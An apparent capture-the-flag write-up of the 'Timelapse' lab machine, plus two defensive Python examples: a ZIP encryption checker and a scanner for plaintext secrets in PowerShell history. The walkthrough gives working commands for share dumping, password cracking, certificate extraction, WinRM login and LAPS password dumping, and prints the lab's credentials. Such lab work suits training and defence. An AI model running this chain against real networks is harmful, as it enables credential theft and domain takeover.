## Summary
---
## External Unauthenticated Access
### Remote Services
```sh
nmap -sV -sC -vvv -oN remote-services-base.nmap $RHOST
nmap -p- -sV -vvv -oN remote-services-all-ports.nmap $RHOST
```
### SMB
| Attribute | Value |
| ------------- | ---------------------------------------- |
| signing | true |
| SMBv1 | false |
| ARCH | x64 |
| OS/build | Windows 10 / Server 2019 Build 17763 x64 |
| name | DC01 |
| guest | true, can list shares |
| [[RID Brute]] | false |
| null session | true |
#### Share Dumping
```sh
nxc smb $RHOST -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
mv /tmp/nxc_hosted/nxc_spider_plus/$RHOST ./SMB-DUMP
```
```sh
╭─[λ]-[~/targets/timelapse/guest]-[10.10.11.152]
╰─> tree
.
└── SMB-DUMP
└── Shares
└── Dev
└── winrm_backup.zip
```
Attempting to unzip the file results in a password prompt:
```
╭─[λ]-[~/targets/timelapse/guest]-[10.10.11.152]
╰─> unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
```
Since the archive prompts for a password, its encryption metadata (the values a cracker needs in order to test candidate passwords offline) can be extracted with `zip2john` into a hash format that John can attack:
```sh
╭─[λ]-[~/targets/timelapse/guest]
╰─> zip2john winrm_backup.zip > win_backup_zip.hash
╭─[λ]-[~/targets/timelapse/guest]
╰─> ~/arsenal/sources/john/run/john win_backup_zip.hash --wordlist=~/arsenal/wordlists/rockyou.txt
╭─[λ]-[~/targets/timelapse/guest]
╰─> ~/arsenal/sources/john/run/john win_backup_zip.hash --show
winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip
```
We got a password, `supremelegacy`, which we paste into the `unzip winrm_backup.zip` password prompt.
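What `zip2john` pulls out of the archive is not a stored password hash but the entry's encryption metadata: for legacy ZipCrypto the encrypted stream header and CRC, for WinZip AES the PBKDF2 salt and password-verification value. Which scheme an archive uses decides how much a password alone protects it, so it is worth checking before a file like this is ever placed on a share. The following is an added example, not code from the original writeup: a small Python parser that walks the local file headers of a ZIP, reports each entry's encryption scheme, and flags entries that rely on ZipCrypto. The sample archive is constructed inline from hand-built headers so the script runs offline; the entry names and contents are made up.

```python
import struct

# ZIP layout constants (PKWARE APPNOTE) and the WinZip AES extra-field id.
LOCAL_HDR_SIG = b"PK\x03\x04"
LOCAL_HDR_FMT = "<4sHHHHHIIIHH"   # sig, version, flags, method, time, date, crc, csize, usize, nlen, elen
LOCAL_HDR_LEN = struct.calcsize(LOCAL_HDR_FMT)  # 30 bytes
FLAG_ENCRYPTED = 0x0001
FLAG_DATA_DESCRIPTOR = 0x0008
AES_EXTRA_ID = 0x9901
AES_STRENGTH = {1: ("AES-128", 8), 2: ("AES-192", 12), 3: ("AES-256", 16)}  # label, salt length


def _extra_fields(extra: bytes):
    """Yield (header_id, payload) for each record in a ZIP extra-field blob."""
    i = 0
    while i + 4 <= len(extra):
        hid, size = struct.unpack_from("<HH", extra, i)
        yield hid, extra[i + 4:i + 4 + size]
        i += 4 + size


def describe_entries(data: bytes) -> list:
    """Walk the local file headers in order and report each entry's protection.

    Returns dicts with name, encrypted, scheme ("none", "ZipCrypto" or
    "AES-nnn (AE-x)") and, for AES entries, the salt length that precedes the data.
    """
    entries, pos = [], 0
    while data.startswith(LOCAL_HDR_SIG, pos):
        (_sig, _ver, flags, _method, _t, _d, _crc, csize, _usize, nlen, elen) = \
            struct.unpack_from(LOCAL_HDR_FMT, data, pos)
        name_start = pos + LOCAL_HDR_LEN
        name = data[name_start:name_start + nlen].decode("utf-8", "replace")
        extra = data[name_start + nlen:name_start + nlen + elen]
        info = {"name": name, "encrypted": bool(flags & FLAG_ENCRYPTED), "scheme": "none"}
        if info["encrypted"]:
            info["scheme"] = "ZipCrypto"  # default unless an AES extra field says otherwise
            for hid, payload in _extra_fields(extra):
                if hid == AES_EXTRA_ID and len(payload) >= 7:
                    vendor_version, _vendor, strength, _real_method = struct.unpack_from("<H2sBH", payload)
                    label, salt_len = AES_STRENGTH.get(strength, ("AES-unknown", 0))
                    info["scheme"] = f"{label} (AE-{vendor_version})"
                    info["salt_len"] = salt_len
        entries.append(info)
        if flags & FLAG_DATA_DESCRIPTOR:
            break  # sizes are stored after the data; stop rather than guess the next header
        pos = name_start + nlen + elen + csize
    return entries


def weakly_protected(entries: list) -> list:
    """Names of entries that rely on legacy ZipCrypto, which offers little protection against offline guessing."""
    return [e["name"] for e in entries if e["scheme"] == "ZipCrypto"]


# --- constructed sample archive: hand-built local headers, made-up names and contents ---
def _local_entry(name: bytes, payload: bytes, flags: int = 0, method: int = 0, extra: bytes = b"") -> bytes:
    hdr = struct.pack(LOCAL_HDR_FMT, LOCAL_HDR_SIG, 20, flags, method, 0, 0, 0,
                      len(payload), len(payload), len(name), len(extra))
    return hdr + name + extra + payload


_AES256_EXTRA = struct.pack("<HH", AES_EXTRA_ID, 7) + struct.pack("<H2sBH", 2, b"AE", 3, 8)
SAMPLE_ZIP = (
    _local_entry(b"readme.txt", b"public notes")
    + _local_entry(b"legacy_backup.pfx", b"\x00" * 24, flags=FLAG_ENCRYPTED, method=8)
    + _local_entry(b"modern_backup.pfx", b"\x00" * 40, flags=FLAG_ENCRYPTED, method=99, extra=_AES256_EXTRA)
)

if __name__ == "__main__":
    found = describe_entries(SAMPLE_ZIP)
    for e in found:
        print(e)
    print("ZipCrypto entries:", weakly_protected(found))
```

Run it against a real archive with `describe_entries(open(path, "rb").read())`; an entry reported as `ZipCrypto` should be treated as effectively unprotected, and even AES entries are only as strong as the password behind them.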
Next up, the [[Personal Information Exchange (PFX) Files]] file inside the archive has its own password, so we extract its hash with `pfx2john.py` and crack that too:
```sh
╭─[λ]-[~/targets/timelapse/guest]
╰─> ~/arsenal/sources/john/run/pfx2john.py legacyy_dev_auth.pfx > legacyy_dev_auth_pfx.hash
╭─[λ]-[~/targets/timelapse/guest]
╰─> john --wordlist=~/arsenal/wordlists/rockyou.txt legacyy_dev_auth_pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cracked 1 password hash (is in /home/noctua/arsenal/sources/john/run/john.pot), use "--show"
No password hashes left to crack (see FAQ)
╭─[λ]-[~/targets/timelapse/guest]
╰─> john --show legacyy_dev_auth_pfx.hash
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx
1 password hash cracked, 0 left
```
And we end up with `thuglegacy`.
Finally I'll extract the private key and the certificate from the `.pfx` file (the cracked password is entered at the import prompt):
```sh
╭─[λ]-[~/targets/timelapse/guest]
╰─> openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out legacyy_dev_auth_private_key.pem
Enter Import Password:
╭─[λ]-[~/targets/timelapse/guest]
╰─> openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legaccy_dev_auth_certificate.pem
```
Lastly we'll connect using [[Evil-WinRM]]:
```sh
evil-winrm -i $RHOST -c legaccy_dev_auth_certificate.pem -k legacyy_dev_auth_private_key.pem
```
And we are now authenticated as the user `legacyy`.
---
## Internal Authenticated Access `legacyy`
### Execution of [[Winpeas]]
```txt
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 434B
╔══════════╣ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : TIMELAPSE
╔══════════╣ Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\Default
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
C:\Users\All Users
C:\Users\All Users\ntuser.pol
```
- We note that [[LAPS - Local Administrator Password Solution]] is enabled.
![[Pasted image 20250210191210.png]]
- I note that there's a PS History file at: `C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`
#### PowerShell History File
```powershell
cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
```
It seems we have another credential: `svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV`.
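PSReadLine appends every interactive command to `ConsoleHost_history.txt`, so a credential typed into `ConvertTo-SecureString ... -AsPlainText` is persisted in plaintext and readable by anyone who later lands on that account. The following is an added example, not part of the original writeup: the kind of check a defender can run over collected history files or scripts. It flags lines that embed plaintext secrets or disable certificate validation and reports them with the secret redacted. The history text is constructed for the example; the account names and values in it are made up.

```python
import re

# Constructed sample of a PSReadLine history file (all names and values are made up).
SAMPLE_HISTORY = """whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Example#Pass123' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net user backupsvc P@ssw0rdExample /add
exit
"""

# Each rule: (label, compiled pattern). A named group "secret" marks the value to redact.
PATTERNS = [
    ("plaintext_securestring",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1.*-AsPlainText", re.I)),
    ("net_user_password",
     re.compile(r"\bnet\s+user\s+\S+\s+(?P<secret>[^/\s]\S*)", re.I)),
    ("password_switch",   # e.g. -p 'value' / -password value; \b keeps -port, -properties out
     re.compile(r"-p(?:assword)?\b\s*(['\"]?)(?P<secret>[^\s'\"]+)\1", re.I)),
    ("cert_checks_disabled",
     re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)),
]


def redact(secret: str) -> str:
    """Keep the first two characters so an analyst can correlate, hide the rest."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "**"


def scan_history(text: str) -> list:
    """Return one finding per (line, rule) match: line number, rule label, redacted secret or None."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in PATTERNS:
            m = pattern.search(line)
            if not m:
                continue
            secret = m.groupdict().get("secret")
            findings.append({"line": lineno, "rule": label,
                             "secret": redact(secret) if secret else None})
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']:>3}  {f['rule']:<24} {f['secret'] or ''}")
```

Point `scan_history` at the contents of each user's `ConsoleHost_history.txt` (or at scripts pulled from shares) and treat every `plaintext_securestring` or `net_user_password` hit as a credential that needs rotating; the `cert_checks_disabled` hits are worth a look too, since skipping CA and CN checks on WinRM sessions removes the protection TLS was meant to give.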
---
## Lateral Movement `legacyy` -> `svc_deploy`
We authenticate using [[Evil-WinRM]].
```sh
╭─[λ]-[~/targets/timelapse/svc_deploy]
╰─> evil-winrm -i $RHOST -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
```
### Bloodhound
- We note that the `TRX` user is a member of `Domain Admins`.
- no kerberoastable users
- no AS-REP Roastable users
- no weird `DCSync`
### Manual Enumeration
```powershell
*Evil-WinRM* PS C:\> whoami /all
...
GROUPS:
TIMELAPSE\LAPS_Readers Group
...
```
Membership in `LAPS_Readers` suggests we can read the [[LAPS - Local Administrator Password Solution]]-managed local administrator passwords.
### Dumping LAPS
```powershell
*Evil-WinRM* PS C:\> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | Select Name, ms-Mcs-AdmPwd
Name ms-Mcs-AdmPwd
---- -------------
DC01 j46d60SqJy95MyvKV1Z4)5;3
DB01
WEB01
DEV01
```
---
## Privesc `svc_deploy` -> `Administrator`
Aaaand, using the LAPS password for `DC01`, we got `Administrator`:
```sh
╭─[λ]-[~/targets/timelapse/Administrator]
╰─> evil-winrm -i $RHOST -u 'Administrator' -p 'j46d60SqJy95MyvKV1Z4)5;3' -S
```
---
## Lessons Learned
- Got to practice [[LAPS - Local Administrator Password Solution]] dumping
- Got to drill things again
- Got to mess around a lot with certificates and John The Ripper.